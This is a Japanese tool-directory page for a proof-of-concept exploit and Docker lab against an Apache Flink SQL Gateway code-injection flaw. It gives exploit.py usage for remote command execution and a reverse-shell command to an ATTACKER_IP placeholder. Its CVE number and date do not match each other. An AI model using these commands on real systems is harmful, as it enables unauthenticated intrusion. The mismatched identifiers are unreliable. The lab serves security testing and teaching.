Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-25194 — CVE-2026-25194 向けの概念実証エクスプロイトとラボ環境 | Kitploit
ツール/GitHubGitHub/dexsemon/cve-2026-25194
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubdexsemon/cve-2026-25194

CVE-2026-25194

CVE-2026-25194 向けの概念実証エクスプロイトとラボ環境

リポジトリを見る
32ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-35194 — Apache Flink SQLコードインジェクション

SQLコード生成インジェクションによる、Apache Flink TaskManagers でのリモートコード実行。

CVECVE-2026-35194
CVSS8.1(高)
CWECWE-94 — コードインジェクション
影響を受けるバージョンFlink 1.15.0 – 1.20.3 / 2.0.0 – 2.2.0
修正済みバージョン1.20.4 / 2.0.2 / 2.1.2 / 2.2.1
攻撃対象領域SQL Gateway REST API(デフォルトポート8083、認証なし)

クイックスタート

1. 脆弱性ラボのデプロイ

root@kitploit:~
docker compose up -d

クラスターの起動に約30秒かかります。次の2つのサービスが起動します:

  • Flink Web UI — http://localhost:8081
  • SQL Gateway REST API — http://localhost:8083

確認:

root@kitploit:~
curl -s http://localhost:8083/v1/info
# Should return version "1.20.3"

2. 依存関係のインストール

root@kitploit:~
pip install requests

3. エクスプロイト

JSONベクター:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v json -c "id > /tmp/pwned"

LIKEベクター:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v like -c "id > /tmp/pwned"

バージョン確認のみ(RCEなし):

root@kitploit:~
python3 exploit.py localhost -p 8083 --check-only

TaskManagerでのRCEを確認:

root@kitploit:~
docker exec flink-taskmanager cat /tmp/pwned

4. リバースシェル

root@kitploit:~
# Terminal 1 — listener
nc -lvnp 4444

# Terminal 2 — exploit
python3 exploit.py TARGET -p 8083 -v json \
  -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

使い方

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [-c COMMAND] [-v {json,like}]
                  [--check-only] [-t TIMEOUT] [--cert CERT] [--key KEY] [--ssl]
                  target

Options:
  target              Target host (IP or hostname)
  -p, --port          SQL Gateway port (default: 8083)
  -c, --command       Shell command to run on TaskManager
  -v, --vector        json (default) or like
  --check-only        Version check only, no exploit
  -t, --timeout       Request timeout in seconds (default: 30)
  --cert / --key      Client cert + key for mTLS environments
  --ssl               Force HTTPS

免責事項

認可されたセキュリティ研究および教育目的にのみ使用してください。

ツールをダウンロード